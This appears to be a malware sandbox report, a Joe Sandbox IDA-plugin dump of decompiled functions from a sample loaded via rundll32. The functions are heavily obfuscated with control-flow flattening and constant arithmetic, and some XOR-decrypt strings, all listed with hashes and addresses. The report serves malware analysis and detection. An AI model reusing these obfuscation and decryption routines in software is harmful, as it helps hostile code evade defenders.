0x0035a26a
0x0035a26f
0x0035a272
0x0035a278
0x0035a278
0x0035a272
0x00000000
0x0035a2d2
0x0035a2d2
0x0035a2e1
0x0035a2e7

Strings

D1, xrefs: 00359FE8

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: D1
API String ID: 0-2215811268
Opcode ID: 6d2ab9fd2b1172c06058c9fd1d3787874053a79feb5ddf99d850471d701bc109
Instruction ID: 4a574a67920698a77fd6d56dc62031eb28926c7d00e16e8206683fa6cdac5a3f
Opcode Fuzzy Hash: 6d2ab9fd2b1172c06058c9fd1d3787874053a79feb5ddf99d850471d701bc109
Instruction Fuzzy Hash: 2CA157729087008FC319CF65C58681BFBE1BBC4354F558A2EF9A95B220D7B5CA498F87

Uniqueness

Uniqueness Score: -1.00%

Function 0035BB23 Relevance: 1.4, Strings: 1, Instructions: 173
COMMONCrypto

Download Yara Rule

C-Code - Quality: 86%

			E0035BB23(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				void* _v12;
				intOrPtr _v16;
				char _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				void* _t138;
				intOrPtr _t161;
				void* _t162;
				void* _t164;
				signed int _t181;
				signed int _t182;
				signed int _t183;
				void* _t185;
				signed int* _t189;

				_t162 = __ecx;
				_push(1);
				_push(1);
				_push(_a16);
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t138);
				_v16 = 0xdfc885;
				_t189 =  &(( &_v76)[8]);
				asm("stosd");
				_t185 = 0;
				_t164 = 0xcc97672;
				asm("stosd");
				asm("stosd");
				_v32 = 0x60c2fa;
				_v32 = _v32 >> 3;
				_v32 = _v32 ^ 0x00046f58;
				_v76 = 0xb548f0;
				_v76 = _v76 >> 0xc;
				_t181 = 0xc;
				_v76 = _v76 * 0x3c;
				_v76 = _v76 + 0xffff64d0;
				_v76 = _v76 ^ 0x0001fd54;
				_v52 = 0x15927a;
				_v52 = _v52 / _t181;
				_v52 = _v52 ^ 0x000151ae;
				_v56 = 0xd6ed9;
				_t182 = 0x1a;
				_v56 = _v56 * 0x3f;
				_v56 = _v56 + 0xfffffbb4;
				_v56 = _v56 ^ 0x0345d46e;
				_v64 = 0xba2b53;
				_v64 = _v64 * 0x6d;
				_v64 = _v64 ^ 0x73d6d9cf;
				_v64 = _v64 * 0x31;
				_v64 = _v64 ^ 0x981330b4;
				_v60 = 0x269f8;
				_v60 = _v60 >> 5;
				_v60 = _v60 + 0xffffb859;
				_v60 = _v60 ^ 0xfff00afd;
				_v68 = 0xfd9147;
				_v68 = _v68 ^ 0x8de1643f;
				_v68 = _v68 / _t182;
				_v68 = _v68 >> 0xf;
				_v68 = _v68 ^ 0x000df039;
				_v72 = 0x5def36;
				_v72 = _v72 | 0xd620e1c7;
				_v72 = _v72 + 0xd307;
				_t183 = 0x48;
				_v72 = _v72 / _t183;
				_v72 = _v72 ^ 0x02f0e4dc;
				_v24 = 0xf7704c;
				_v24 = _v24 + 0x27dd;
				_v24 = _v24 ^ 0x00ff74b2;
				_v28 = 0x151ed9;
				_v28 = _v28 * 0x48;
				_v28 = _v28 ^ 0x05f046e2;
				_v36 = 0xddc4df;
				_v36 = _v36 >> 0xf;
				_v36 = _v36 | 0x7f83127d;
				_v36 = _v36 ^ 0x7f8e5ab1;
				_v40 = 0x29fd7f;
				_v40 = _v40 >> 7;
				_v40 = _v40 | 0x8d3b2756;
				_v40 = _v40 ^ 0x8d37b79a;
				_v44 = 0x8dc5a8;
				_v44 = _v44 * 0x63;
				_v44 = _v44 >> 4;
				_v44 = _v44 ^ 0x036b3557;
				_v48 = 0xd61f7e;
				_v48 = _v48 | 0xd43d52c3;
				_v48 = _v48 + 0xa376;
				_v48 = _v48 ^ 0xd504b7b0;
				_t184 = _v20;
				while(_t164 != 0x2524be6) {
					if(_t164 == 0xcc97672) {
						_t164 = 0xe41debb;
						continue;
					} else {
						if(_t164 == 0xdd773d9) {
							if(E0035D8EC(_v52, _v56,  &_v20, _t184) != 0) {
								_t164 = 0xe01b1ec;
								continue;
							}
						} else {
							if(_t164 == 0xe01b1ec) {
								E00360AC8(_v64, _v60, 1, _v68, _v20, _v72, _a12, _t162, _v24, 1, _t164, _v28);
								_t189 =  &(_t189[0xa]);
								_t164 = 0x2524be6;
								_t185 =  !=  ? 1 : _t185;
								continue;
							} else {
								if(_t164 != 0xe41debb) {
									L13:
									if(_t164 != 0x78a313b) {
										continue;
									}
								} else {
									_t161 = E00343DE2(_t164);
									_t184 = _t161;
									if(_t161 != 0xffffffff) {
										_t164 = 0xdd773d9;
										continue;
									}
								}
							}
						}
					}
					return _t185;
				}
				E00351E67(_v36, _v40, _v44, _v48, _v20);
				_t189 =  &(_t189[3]);
				_t164 = 0x78a313b;
				goto L13;
			}

0x0035bb2c
0x0035bb2f
0x0035bb30
0x0035bb31
0x0035bb35
0x0035bb39
0x0035bb3d
0x0035bb41
0x0035bb42
0x0035bb43
0x0035bb48
0x0035bb56
0x0035bb59
0x0035bb5c
0x0035bb5e
0x0035bb65
0x0035bb66
0x0035bb67
0x0035bb6f
0x0035bb74
0x0035bb7c
0x0035bb84
0x0035bb8e
0x0035bb91
0x0035bb95
0x0035bb9d
0x0035bba5
0x0035bbbd
0x0035bbc1
0x0035bbc9
0x0035bbd6
0x0035bbd9
0x0035bbdd
0x0035bbe5
0x0035bbed
0x0035bbfa
0x0035bbfe
0x0035bc0b
0x0035bc0f
0x0035bc17
0x0035bc1f
0x0035bc24
0x0035bc2c
0x0035bc34
0x0035bc3c
0x0035bc4c
0x0035bc50
0x0035bc55
0x0035bc5d
0x0035bc65
0x0035bc6d
0x0035bc79
0x0035bc7c
0x0035bc80
0x0035bc88
0x0035bc90
0x0035bc98
0x0035bca0
0x0035bcad
0x0035bcb1
0x0035bcb9
0x0035bcc1
0x0035bcc6
0x0035bcce
0x0035bcd6
0x0035bcde
0x0035bce3
0x0035bceb
0x0035bcf3
0x0035bd00
0x0035bd04
0x0035bd09
0x0035bd11
0x0035bd19
0x0035bd21
0x0035bd29
0x0035bd31
0x0035bd35
0x0035bd47
0x0035bde6
0x00000000
0x0035bd4d
0x0035bd53
0x0035bdda
0x0035bddc
0x00000000
0x0035bddc
0x0035bd55
0x0035bd5b
0x0035bdac
0x0035bdb1
0x0035bdb4
0x0035bdbb
0x00000000
0x0035bd5d
0x0035bd63
0x0035be11
0x0035be17
0x00000000
0x00000000
0x0035bd69
0x0035bd71
0x0035bd76
0x0035bd7b
0x0035bd81
0x00000000
0x0035bd81
0x0035bd7b
0x0035bd63
0x0035bd5b
0x0035bd53
0x0035be26
0x0035be26
0x0035be04
0x0035be09
0x0035be0c
0x00000000

Strings

6], xrefs: 0035BC5D

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 6]
API String ID: 0-3974934468
Opcode ID: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
Instruction ID: 8e35d7b49e78808468334fc236c9be9561b1927379f00374de74e6c9178a7ac4
Opcode Fuzzy Hash: 02ce66d0ac1312b45417b61cb3151e0e53b916cf6161079afb78e77aaf59e863
Instruction Fuzzy Hash: 1E712F71108341ABC359CF25C88A81BFBF5FBC9758F504A1DFA969A260C372CA498F43

Uniqueness

Uniqueness Score: -1.00%

Function 00345361 Relevance: 1.4, Strings: 1, Instructions: 124
COMMONCrypto

Download Yara Rule

C-Code - Quality: 91%

			E00345361(void* __ecx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				unsigned int _v4;
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				unsigned int _v32;
				void* __edx;
				void* _t84;
				void* _t104;
				void* _t118;
				signed int _t120;
				signed int _t121;
				signed int _t122;
				void* _t124;
				signed int* _t127;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				E003520B9(_t84);
				_v4 = 0x18047d;
				_t127 =  &(( &_v32)[5]);
				_v4 = _v4 >> 0xa;
				_v4 = _v4 ^ 0x000d3248;
				_t124 = 0;
				_v28 = 0x90acd4;
				_t104 = 0x35df4ed;
				_v28 = _v28 >> 5;
				_v28 = _v28 + 0xffff3107;
				_v28 = _v28 | 0xd0f9b279;
				_v28 = _v28 ^ 0xd0f1daef;
				_v8 = 0x9d14b7;
				_v8 = _v8 << 2;
				_v8 = _v8 ^ 0x027823b1;
				_v32 = 0xfd6947;
				_v32 = _v32 + 0xffff03bf;
				_t120 = 0x72;
				_v32 = _v32 / _t120;
				_v32 = _v32 >> 0xa;
				_v32 = _v32 ^ 0x00066e44;
				_v16 = 0x111da;
				_v16 = _v16 ^ 0xdd7c73d4;
				_v16 = _v16 | 0x7d37165e;
				_v16 = _v16 ^ 0xfd769a76;
				_v12 = 0x2531de;
				_v12 = _v12 << 0xd;
				_v12 = _v12 ^ 0xa63e9142;
				_v20 = 0x6e0002;
				_v20 = _v20 >> 0xe;
				_t121 = 0xe;
				_v20 = _v20 / _t121;
				_t122 = 0x3d;
				_v20 = _v20 * 0x64;
				_v20 = _v20 ^ 0x000bef19;
				_v24 = 0xa3fc95;
				_v24 = _v24 + 0xdcd1;
				_v24 = _v24 << 3;
				_v24 = _v24 / _t122;
				_v24 = _v24 ^ 0x0013a2ec;
				while(_t104 != 0x311781) {
					if(_t104 == 0x35df4ed) {
						_push(_t104);
						_push(_t104);
						_t118 = 0x28;
						 *0x363e08 = E00347FF2(_t118);
						_t104 = 0x605992c;
						continue;
					} else {
						if(_t104 == 0x477ef52) {
							E0034924B();
							_t104 = 0x311781;
							continue;
						} else {
							if(_t104 == 0x605992c) {
								if(E00360F33() != 0) {
									_t104 = 0xdb1ba22;
									continue;
								}
							} else {
								if(_t104 != 0xdb1ba22) {
									L13:
									if(_t104 != 0x5723dc8) {
										continue;
									}
								} else {
									_t124 = E0034960D(_v16, _a12, _a8, _v12);
									_t127 =  &(_t127[3]);
									if(_t124 == 0) {
										_t104 = 0x477ef52;
										continue;
									}
								}
							}
						}
					}
					return _t124;
				}
				E00358519(_v20, _v24,  *0x363e08);
				_t104 = 0x5723dc8;
				goto L13;
			}

0x00345368
0x0034536c
0x00345370
0x00345376
0x0034537b
0x00345383
0x00345386
0x0034538d
0x00345395
0x00345397
0x0034539f
0x003453a4
0x003453ae
0x003453bb
0x003453c3
0x003453cb
0x003453d3
0x003453d8
0x003453e0
0x003453e8
0x003453f6
0x003453fb
0x00345401
0x00345406
0x0034540e
0x00345416
0x0034541e
0x00345426
0x0034542e
0x00345436
0x0034543b
0x00345443
0x0034544b
0x00345454
0x00345459
0x00345464
0x00345465
0x00345469
0x00345471
0x00345479
0x00345481
0x00345491
0x00345495
0x0034549d
0x003454a7
0x00345501
0x00345502
0x00345505
0x0034550d
0x00345512
0x00000000
0x003454a9
0x003454ab
0x003454ec
0x003454f1
0x00000000
0x003454ad
0x003454b3
0x003454e6
0x003454e8
0x00000000
0x003454e8
0x003454b5
0x003454b7
0x00345532
0x00345538
0x00000000
0x00000000
0x003454b9
0x003454d2
0x003454d4
0x003454d9
0x003454db
0x00000000
0x003454db
0x003454d9
0x003454b7
0x003454b3
0x003454ab
0x00345547
0x00345547
0x00345527
0x0034552d
0x00000000

Strings

H2, xrefs: 0034538D

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: H2
API String ID: 0-302591398
Opcode ID: f2b9110e6d9b19cbe15bf1df6b9f94f0099298f718a6adc565c688cb6153bb50
Instruction ID: 88488a3a65315e49c3f600fee5397a92a9673a14ae7fd14c97723396c73e8e74
Opcode Fuzzy Hash: f2b9110e6d9b19cbe15bf1df6b9f94f0099298f718a6adc565c688cb6153bb50
Instruction Fuzzy Hash: C241C0326083019FC729CF26E44542FBBE1FBD8718F144A1DF5865A261D7B0DA88CB93

Uniqueness

Uniqueness Score: -1.00%

Function 00348B3D Relevance: 1.4, Strings: 1, Instructions: 109
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E00348B3D(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr _a16) {
				char _v44;
				signed int _v48;
				signed int _v52;
				signed int _v56;
				signed int _v60;
				signed int _v64;
				signed int _v68;
				signed int _v72;
				signed int _v76;
				signed int _v80;
				void* _t83;
				void* _t89;
				signed int _t93;
				void* _t96;
				void* _t108;
				void* _t109;
				void* _t111;
				void* _t112;

				_push(_a16);
				_t108 = __ecx;
				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t83);
				_v72 = 0xbb1237;
				_t112 = _t111 + 0x18;
				_v72 = _v72 >> 0xf;
				_v72 = _v72 + 0xd544;
				_t109 = 0;
				_v72 = _v72 ^ 0x000eb3e9;
				_t96 = 0x815a082;
				_v48 = 0x50cb35;
				_v48 = _v48 + 0xffff87ec;
				_v48 = _v48 ^ 0x00585237;
				_v52 = 0xa4cd83;
				_v52 = _v52 ^ 0x5b114d95;
				_v52 = _v52 ^ 0x5bb6524d;
				_v56 = 0xbe8ecf;
				_v56 = _v56 << 0xe;
				_v56 = _v56 ^ 0xa3b0842f;
				_v60 = 0x771210;
				_v60 = _v60 | 0x3e44f288;
				_v60 = _v60 ^ 0x3e758d5b;
				_v80 = 0xf3b10d;
				_v80 = _v80 ^ 0x3cb59f0c;
				_v80 = _v80 >> 4;
				_v80 = _v80 + 0xffffd90b;
				_v80 = _v80 ^ 0x03c55d5e;
				_v64 = 0x352515;
				_v64 = _v64 ^ 0x7339bda5;
				_v64 = _v64 + 0x1326;
				_v64 = _v64 ^ 0x7306d08c;
				_v68 = 0x4f62f3;
				_v68 = _v68 << 0xd;
				_v68 = _v68 ^ 0x83faab25;
				_v68 = _v68 ^ 0x6fa8977d;
				_v76 = 0x2ac691;
				_v76 = _v76 << 9;
				_t93 = 0x6b;
				_v76 = _v76 / _t93;
				_v76 = _v76 << 0xc;
				_v76 = _v76 ^ 0xcae566b9;
				do {
					while(_t96 != 0x54856a9) {
						if(_t96 == 0x815a082) {
							_t96 = 0x54856a9;
							continue;
						} else {
							if(_t96 == 0xa9da54a) {
								_t89 = E0035D97D( &_v44, _v56, __eflags, _v60, _t108 + 0x18, _v80);
								_t112 = _t112 + 0xc;
								__eflags = _t89;
								if(__eflags != 0) {
									_t96 = 0xefea9c1;
									continue;
								}
							} else {
								_t118 = _t96 - 0xefea9c1;
								if(_t96 != 0xefea9c1) {
									goto L11;
								} else {
									E0035D97D( &_v44, _v64, _t118, _v68, _t108 + 0xc, _v76);
									_t109 =  !=  ? 1 : _t109;
								}
							}
						}
						L6:
						return _t109;
					}
					E00343DBC( &_v44, _a8, _v72, _v48, _v52);
					_t112 = _t112 + 0xc;
					_t96 = 0xa9da54a;
					L11:
					__eflags = _t96 - 0x309e957;
				} while (__eflags != 0);
				goto L6;
			}

0x00348b44
0x00348b48
0x00348b4a
0x00348b4e
0x00348b52
0x00348b56
0x00348b57
0x00348b58
0x00348b5d
0x00348b65
0x00348b68
0x00348b6f
0x00348b77
0x00348b79
0x00348b81
0x00348b86
0x00348b93
0x00348b9b
0x00348ba3
0x00348bab
0x00348bb3
0x00348bbb
0x00348bc3
0x00348bc8
0x00348bd0
0x00348bd8
0x00348be0
0x00348be8
0x00348bf0
0x00348bf8
0x00348bfd
0x00348c05
0x00348c0d
0x00348c15
0x00348c1d
0x00348c25
0x00348c2d
0x00348c35
0x00348c3a
0x00348c42
0x00348c4a
0x00348c52
0x00348c5d
0x00348c65
0x00348c69
0x00348c6e
0x00348c76
0x00348c76
0x00348c80
0x00348ce0
0x00000000
0x00348c82
0x00348c88
0x00348cd0
0x00348cd5
0x00348cd8
0x00348cda
0x00348cdc
0x00000000
0x00348cdc
0x00348c8a
0x00348c8a
0x00348c8c
0x00000000
0x00348c8e
0x00348ca2
0x00348caf
0x00348caf
0x00348c8c
0x00348c88
0x00348cb3
0x00348cbb
0x00348cbb
0x00348cf8
0x00348cfd
0x00348d00
0x00348d05
0x00348d05
0x00348d05
0x00000000

Strings

7RX, xrefs: 00348B9B

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: 7RX
API String ID: 0-861457431
Opcode ID: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
Instruction ID: b0c2edba79c7a865b21a7fa3895c8fe7e87777e76964da5278366747c4e70bdd
Opcode Fuzzy Hash: 22ac0985efce6a924f31ebd31ed7415f32b1f56f57cf5f3da1b1feb7b99d064e
Instruction Fuzzy Hash: 6D4175711097029BCB959F21848982FBBE1FFC4B88F500A2DF59696220D7718A59CF97

Uniqueness

Uniqueness Score: -1.00%

Function 00357BA6 Relevance: 1.3, Strings: 1, Instructions: 97
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E00357BA6(signed int* __ecx, void* __edx, void* __eflags, intOrPtr _a4, signed int _a8) {
				intOrPtr _v4;
				intOrPtr _v8;
				intOrPtr _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				void* _t53;
				signed int _t60;
				signed int _t67;
				unsigned int _t71;
				signed int _t74;
				signed int _t76;
				signed int _t77;
				void* _t85;
				signed int _t92;
				void* _t98;
				intOrPtr _t99;
				signed int* _t100;
				signed int* _t101;
				signed int* _t102;

				_t100 = _a8;
				_t102 = __ecx;
				_push(_t100);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t53);
				_v12 = 0x7b3704;
				_t99 = 0;
				_v8 = 0x80915f;
				_v4 = 0;
				_v24 = 0xa71362;
				_v24 = _v24 << 0xb;
				_v24 = _v24 + 0x3e5;
				_v24 = _v24 ^ 0x3895df4e;
				_v28 = 0xc4b4e;
				_t76 = 0x2f;
				_v28 = _v28 * 0x14;
				_v28 = _v28 | 0x55175d82;
				_v28 = _v28 ^ 0x65144985;
				_v28 = _v28 ^ 0x30e15ded;
				_a8 = 0x3b45b7;
				_a8 = _a8 / _t76;
				_a8 = _a8 << 4;
				_t77 = 0x6c;
				_a8 = _a8 / _t77;
				_a8 = _a8 ^ 0x000cc8ea;
				_t60 =  *_t100;
				_t101 =  &(_t100[2]);
				_t92 = _t100[1] ^ _t60;
				_v20 = _t60;
				_v16 = _t92;
				_t71 =  !=  ? (_t92 & 0xfffffffc) + 4 : _t92;
				_t67 = E00347FF2(_t71);
				_a8 = _t67;
				if(_t67 != 0) {
					_t98 =  >  ? 0 :  &(_t101[_t71 >> 2]) - _t101 + 3 >> 2;
					if(_t98 != 0) {
						_t74 = _v20;
						_t85 = _t67 - _t101;
						do {
							_t99 = _t99 + 1;
							 *(_t85 + _t101) =  *_t101 ^ _t74;
							_t101 =  &(_t101[1]);
						} while (_t99 < _t98);
						_t67 = _a8;
					}
					if(_t102 != 0) {
						 *_t102 = _v16;
						return _t67;
					}
				}
				return _t67;
			}

0x00357bac
0x00357bb0
0x00357bb3
0x00357bb4
0x00357bb8
0x00357bb9
0x00357bba
0x00357bbf
0x00357bc7
0x00357bc9
0x00357bd3
0x00357bd7
0x00357bdf
0x00357be4
0x00357bec
0x00357bf4
0x00357c03
0x00357c06
0x00357c0a
0x00357c12
0x00357c1a
0x00357c22
0x00357c32
0x00357c36
0x00357c3f
0x00357c42
0x00357c46
0x00357c4e
0x00357c53
0x00357c56
0x00357c58
0x00357c5e
0x00357c6f
0x00357c83
0x00357c88
0x00357c90
0x00357ca6
0x00357cab
0x00357cad
0x00357cb3
0x00357cb5
0x00357cb9
0x00357cba
0x00357cbd
0x00357cc0
0x00357cc4
0x00357cc4
0x00357cca
0x00357cd0
0x00000000
0x00357cd0
0x00357cca
0x00357cda

Strings

]0, xrefs: 00357C1A

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: ]0
API String ID: 0-3096761382
Opcode ID: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
Instruction ID: b8addb926791b49211c720ac26437f6182bbdc00477cb727404e4c8685a54e1f
Opcode Fuzzy Hash: f410119f50637a55b7532a698d6b681cf897767909917c4c835d32da9b826f29
Instruction Fuzzy Hash: 7631AA716093008FD318CF29C88590BFBE5FFC9708F008A2EF98997250D775E9058B46

Uniqueness

Uniqueness Score: -1.00%

Function 00343C3C Relevance: 1.3, Strings: 1, Instructions: 94
COMMONCrypto

Download Yara Rule

C-Code - Quality: 83%

			E00343C3C(void* __ecx, void* __edx, intOrPtr _a4, intOrPtr _a8, intOrPtr _a12) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v40;
				signed int _v44;
				char _v564;
				void* _t97;
				signed int _t114;
				signed int _t115;
				signed int _t116;

				_push(_a12);
				_push(_a8);
				_push(_a4);
				_push(__edx);
				_push(__ecx);
				E003520B9(_t97);
				_v32 = 0xf161c0;
				_v32 = _v32 + 0xffff8ad4;
				_v32 = _v32 ^ 0x00fbd9a3;
				_v28 = 0xfc9039;
				_t114 = 0x1b;
				_v28 = _v28 / _t114;
				_t115 = 5;
				_v28 = _v28 * 0x6e;
				_v28 = _v28 ^ 0x040e4771;
				_v44 = 0x2ba482;
				_v44 = _v44 | 0x0543644d;
				_v44 = _v44 ^ 0x0568ae00;
				_v36 = 0xddb19;
				_t116 = 0x23;
				_v36 = _v36 / _t115;
				_v36 = _v36 ^ 0x000396ce;
				_v8 = 0xc420c0;
				_v8 = _v8 >> 8;
				_v8 = _v8 + 0xffff6316;
				_v8 = _v8 * 0x7a;
				_v8 = _v8 ^ 0x001ea2c5;
				_v12 = 0xb92025;
				_v12 = _v12 >> 3;
				_v12 = _v12 + 0xfe32;
				_v12 = _v12 << 0xe;
				_v12 = _v12 ^ 0x088e8322;
				_v24 = 0x144a1a;
				_v24 = _v24 + 0xffffa246;
				_v24 = _v24 + 0xffff01e3;
				_v24 = _v24 ^ 0x001122d6;
				_v16 = 0x7d3361;
				_v16 = _v16 / _t116;
				_v16 = _v16 << 4;
				_v16 = _v16 >> 9;
				_v16 = _v16 ^ 0x00004840;
				_v20 = 0xb3d6e6;
				_v20 = _v20 ^ 0x61ac6c83;
				_v20 = _v20 ^ 0xeb92407c;
				_v20 = _v20 ^ 0x8a8fe9bf;
				_v40 = 0xbcf254;
				_v40 = _v40 << 0xc;
				_v40 = _v40 ^ 0xcf275652;
				_push(_v44);
				_push(_v28);
				E0034A918(_a4, _v40, _v36, _v8, E0035DCF7(_v32, 0x3417c0, _v40), _v12,  &_v564);
				E0034A8B0(_v24, _t107, _v16);
				return E00351F8A(_v20, _v40,  &_v564);
			}

0x00343c46
0x00343c49
0x00343c4c
0x00343c4f
0x00343c50
0x00343c51
0x00343c56
0x00343c5f
0x00343c66
0x00343c6d
0x00343c79
0x00343c7e
0x00343c87
0x00343c8a
0x00343c8d
0x00343c94
0x00343c9b
0x00343ca2
0x00343ca9
0x00343cb5
0x00343cb6
0x00343cbb
0x00343cc2
0x00343cc9
0x00343ccd
0x00343cd8
0x00343cdb
0x00343ce2
0x00343ce9
0x00343ced
0x00343cf4
0x00343cf8
0x00343cff
0x00343d06
0x00343d0d
0x00343d14
0x00343d1b
0x00343d2c
0x00343d2f
0x00343d33
0x00343d37
0x00343d3e
0x00343d45
0x00343d4c
0x00343d53
0x00343d5a
0x00343d61
0x00343d65
0x00343d6c
0x00343d6f
0x00343d90
0x00343d9d
0x00343dbb

Strings

a3}, xrefs: 00343D1B

Memory Dump Source

Source File: 00000009.00000002.460122857.0000000000341000.00000020.00000800.00020000.00000000.sdmp, Offset: 00340000, based on PE: true

Associated: 00000009.00000002.460117697.0000000000340000.00000004.00000800.00020000.00000000.sdmpDownload File
Associated: 00000009.00000002.460138899.0000000000363000.00000004.00000800.00020000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_9_2_340000_rundll32.jbxd

Yara matches

Similarity

API ID:
String ID: a3}
API String ID: 0-1821053108
Opcode ID: cb854d2bf8809945d7a1e4bf1456bebbc628e1f359f73ac1449d5ef152ba18a1
Instruction ID: 5af4006e9d056e1f7d5413d1c429c918980e50b06e8c6602aa838a0af2ae809d
Opcode Fuzzy Hash: cb854d2bf8809945d7a1e4bf1456bebbc628e1f359f73ac1449d5ef152ba18a1
Instruction Fuzzy Hash: 4A41F272D0020AEBCF09CFE0D94A9EEBBB2FB44314F208159E510BA260D7B55B55DFA1

Uniqueness

Uniqueness Score: -1.00%

Function 00358606 Relevance: 1.3, Strings: 1, Instructions: 90
COMMONCrypto

Download Yara Rule

C-Code - Quality: 89%

			E00358606(void* __ecx, signed int* __edx, void* __eflags) {
				void* _t46;
				signed int _t50;
				unsigned int* _t63;
				signed int _t64;
				signed int _t66;
				signed int _t72;
				unsigned int _t73;
				unsigned int _t74;
				unsigned int* _t78;
				signed int* _t79;
				signed int* _t80;
				unsigned int _t82;
				void* _t88;
				void* _t90;
				void* _t92;
				void* _t93;

				_push( *(_t92 + 0x2c));
				_push( *(_t92 + 0x2c));
				_push( *(_t92 + 0x2c));
				_push(__edx);
				E003520B9(_t46);
				 *(_t92 + 0x20) = 0xe2d3c4;
				_t79 =  &(__edx[1]);
				 *(_t92 + 0x20) =  *(_t92 + 0x20) + 0xa17d;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) << 0x10;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xc7a816b6;
				 *(_t92 + 0x20) =  *(_t92 + 0x20) ^ 0xb2e477eb;
				 *(_t92 + 0x28) = 0xf8496b;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) >> 0xa;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) * 0x37;
				 *(_t92 + 0x28) =  *(_t92 + 0x28) ^ 0x0006b61c;
				 *(_t92 + 0x24) = 0x2326e4;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) | 0x0bc2d168;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) << 4;
				 *(_t92 + 0x24) =  *(_t92 + 0x24) ^ 0xbe3c76f1;
				_t66 =  *__edx;
				_t80 =  &(_t79[1]);
				_t50 =  *_t79 ^ _t66;
				 *(_t92 + 0x2c) = _t66;
				 *(_t92 + 0x30) = _t50;
				_t30 = _t50 + 1; // 0xb
				_t82 =  !=  ? (_t30 & 0xfffffffc) + 4 : _t30;
				_t93 = _t92 + 0xc;
				_t63 = E00347FF2(_t82);
				 *(_t93 + 0x1c) = _t63;
				if(_t63 != 0) {
					_t90 = 0;
					_t78 = _t63;
					_t88 =  >  ? 0 :  &(_t80[_t82 >> 2]) - _t80 + 3 >> 2;
					if(_t88 != 0) {
						_t64 =  *(_t93 + 0x1c);
						do {
							_t72 =  *_t80;
							_t80 =  &(_t80[1]);
							_t73 = _t72 ^ _t64;
							 *_t78 = _t73;
							_t78 =  &(_t78[1]);
							_t74 = _t73 >> 0x10;
							 *((char*)(_t78 - 3)) = _t73 >> 8;
							 *(_t78 - 2) = _t74;
							_t90 = _t90 + 1;
							 *((char*)(_t78 - 1)) = _t74 >> 8;
						} while (_t90 < _t88);
						_t63 =  *(_t93 + 0x18);
					}
					 *((char*)(_t63 +  *((intOrPtr*)(_t93 + 0x20)))) = 0;
				}
				return _t63;
			}

0x0035860c
0x00358610
0x00358614
0x00358618
0x0035861a
0x0035861f
0x00358627
0x0035862a
0x00358632
0x00358637
0x0035863f
0x00358647
0x0035864f
0x00358659
0x0035865d
0x00358665
0x0035866d
0x00358675
0x0035867a
0x00358682
0x00358686
0x00358689
0x0035868b
0x0035868f
0x00358693
